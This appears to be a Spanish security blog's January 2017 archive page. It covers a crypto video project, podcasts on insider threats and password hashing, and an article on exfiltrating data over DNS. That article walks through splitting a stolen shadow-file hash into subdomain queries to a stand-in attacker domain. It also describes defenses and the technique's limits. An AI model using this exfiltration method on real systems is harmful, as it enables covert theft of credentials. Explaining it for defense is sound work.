Archivo por meses: enero 2017

Enlace

El Proyecto Thoth es un proyecto educativo de CriptoRed que forma parte de la Universidad Politécnica de Madrid.

Este proyecto, que arranca en 2014, se basa en la publicación de un vídeo mensual de corta duración (aprox. 5 minutos) en el que se explican conceptos relacionados con la seguridad informática.

Los vídeos, disponibles en Youtube en el canal general de la UPM, o bien en el lateral de la web del proyecto Thoth, se clasifican en 5 categorías:

  1. Fundamentos de seguridad
  2. Criptografía clásica
  3. Historia de la criptografía
  4. Matemáticas en criptografía
  5. Criptografía moderna

Si tenéis 5 minutos ¡aprovechadlos!

Para que no os perdáis esta información entre las diferentes entradas y publicaciones, os dejo un enlace en la barra superior ↑

Podcast – 12 – El atacante interno

Aunque cuando hacemos referencia a un atacante la imagen que se nos viene a la cabeza, gracias a las películas, es la de un hacker malvado sentado en una habitación oscura, la verdad es que el principal peligro es más cercano y, precisamente por ello por más invisible: el atacante interno.

Micro con feed

Fuente imagen:PerfectYourPodcast

La mayoría de empresas entienden, o al menos perciben, los riesgos inherentes a Internet y suelen aceptar la necesidad de implantar medidas de seguridad para proteger a su empresa. En cambio, el concepto del atacante interno es más difícil de ser asimilado ya que siempre hay una relación de confianza con los trabajadores.

Antes este escenario es normal que se apliquen sistemas de seguridad perimetrales, que protegen de los ataques desde el exterior, pero no tanto que se apliquen políticas y medidas de seguridad internas a la propia empresa.

Descarga directa.

Exfiltración de información usando el protocolo DNS

Uno de los problemas con lo que se encuentra un usuario malintencionado (ya sea interno o un atacante externo) cuando obtiene información deseada es cómo sacarla sin que le descubran. En este artículo veremos algunas opciones para extraer esta información usando el servicio DNS, el cuál casi siempre está operativo en casi cualquier sistema.

Extracción de información mediante peticiones DNS

DNS logo

Fuente imagen: bleepingtech.com

Este sistema de extracción de información parte del supuesto de que un atacante ha conseguido infiltrarse en un sistema y necesita sacar la información obtenida para poder tratarla y utilizarla. Si la información a extraer no es muy grande puede realizar el siguiente montaje:

  1. El atacante monta en Internet un servidor DNS que publica la información sobre el dominio «malintencionado.es«. Es posible crear una web sencilla para dar apariencia de normalidad.
  2. Este servidor DNS responderá a todas la peticiones que reciba de forma normal, pero almacenará todos los subdominios solicitados de forma correlativa.

En este punto el usuario malintencionado ya dispone de un servidor DNS accesible públicamente y preparado para almacenar la información. Cuando un equipo realice una solicitud de resolución de nombre el sistema DNS de la corporación comprobará el dominio pedido «malintencionado.es» y entonces realizará una solicitud normal al servidor DNS malintencionado quien la registrará y contestará para pasar desapercibido.

Supongamos que el atacante se ha hecho con el fichero shadow de nuestro sistema Linux que tiene la siguiente información:

oracle:$6$MvOuttAz$5ZUMuRkx8b2kGJ/jQvTszUQz73R1G9wM78kh1SogNRnSNARUtH9YFbRX/E9iSkcokC4Djyo86DDj39Tq5ebw4/:15057:0:99999:7:::

Así pues a nuestro atacante le interesa enviar al exterior el nombre de usuario y el hash de la contraseña almacenado en este fichero. Una vez tenga esta información en su poder podrá intentar atacar este hash, mediante la técnica que prefiera, para obtener la contraseña válida. Veamos cómo se podría realizar esta extracción:

  1. El servidor infectado solicita las siguientes resoluciones en este mismo orden:
    1. USER.malintenciado.es
    2. oracle.malintenciado.es
    3. HASH.malintenciado.es
    4. $6$MvOuttAz$5ZUMuRkx8b2kGJ.malintencionado.es
    5. /jQvTszUQz73R1G9wM78kh1SogNRnSNARUtH9YFbRX.malintencionado.es
    6. /E9iSkcokC4Djyo86DDj39Tq5ebw4/.malintencionado.es
    7. EOF.malintencionado.es
  2. El servidor recompone la información y obtiene los datos enviados:
    • USERoracleHASH$6$MvOuttAz$5ZUMuRkx8b2kGJ/jQvTszUQz73R1G9wM78kh1SogNRnSNARUtH9YFbRX/E9iSkcokC4Djyo86DDj39Tq5ebw4/EOF

En este ejemplo se utilizan palabras claves para marcar los diferentes campos enviados ya que, aunque sea posible, será muy difícil que estas palabras claves coincidan dentro del resultado de la función resumen enviada. Con este formato se facilita el tratamiento automatizado en destino.

Defensas ante la extracción de información vía DNS

El primer paso para una coporación es obligar a que todos los servicios internos utilicen el sistema DNS corporativo. No hay razón alguna para que un servidor u ordenador de usuario pueda acceder a DNS externos. Toda conexión a un servidor DNS externo, que no provenga de nuestro propio sistema DNS corporativo, debe ser bloqueada a nivel de firewall.

Los sistemas IDS/IPS podrían detectar un repentino aumento de peticiones de resoluciones de un mismo dominio y generar un evento. Aunque lo más probable es que en estos casos el sistema nos informe de un posible escaneo de un dominio concreto y no de una posible exfiltración de información. Ante la aparición de un evento de estas características los administradores deberían revisar el servidor afectado en busca de la causa de ese supuesto escaneo pudiendo detectar la infiltración y cortarla.

Algunos servidores DNS pueden generar eventos cuando detectan que los tiempos de vida de las resoluciones son muy bajos. Generalmente un dominio de Internet se guarda en caché durante horas, por lo que si un servidor responde que sus dominios sólo deben cachearse durante pocos minutos podría considerarse un comportamiento anómalo (aunque sea perfectamente plausible según el protocolo). Este comportamiento (el reducir los tiempos de almacenamiento temporal) suele formar parte de los ataques DoS a los servidores DNS por lo que es algo que suelen tener en cuenta.

Como vemos la detección de este comportamiento depende en gran medida de la pericia del atacante (de la configuración del servidor DNS malicioso y de su prisa en sacar la información) y, además, los eventos suelen asociarse a otros tipos de ataques por lo que la detección real de este comportamiento es muy difícil.

Limitaciones de esta técnica de exfiltración

Esta técnica de exfiltración es muy lenta comparada con otras más habituales (conexión a webs externas, envío de correos electrónicos, subida a servidores SFTP, etc.) por lo que suele utilizarse cuando las anteriores han fallado. Los nombres de subdominios no pueden ser excesivamente largos ni contener caracteres extraños por lo que se limita la información a enviar. Así pues se trata de una técnica lenta, tanto por la cantidad de información enviada cada vez como para pasar desapercibidos antes los sistemas IDS/IPS.

Cabe indicar que si utilizamos el servicio DNS sobre UDP sería posible la pérdida de un paquete con lo que la información enviada no sería útil. El uso de conexiones TCP elimina este fallo pero facilita la detección de múltiples conexiones por parte de los sistemas de seguridad.

Podcast – 11 – Almacenar contraseñas de forma segura

Tras varias noticias sobre robo de contraseñas en diferentes sistemas (Yahoo, Dropbox, LinkedIn, etc.), en el capítulo de hoy veremos cómo se almacenan estas contraseñas en un sistema seguro.

Salt and Pepper

Fuente: PotteryBarn

La idea es almacenar una forma de identificarnos de tal manera que aunque alguien consiga obtener esa información no sea capaz de obtener la contraseña inicial. Para esto se recurre a las funciones matemáticas de resumen (hash en inglés). Estas funciones tienen una serie de características que nos aseguran que es computacionalmente inviable obtener la contraseña inicial aunque se tenga el resultado final.

De igual forma explico las funcionalidades ‘Salt’ y ‘Peeper’ y cómo estas técnicas ayudan a mejorar la seguridad de nuestras contraseñas frente a ataques mediante tablas de resultados precalculadas.

Descarga directa.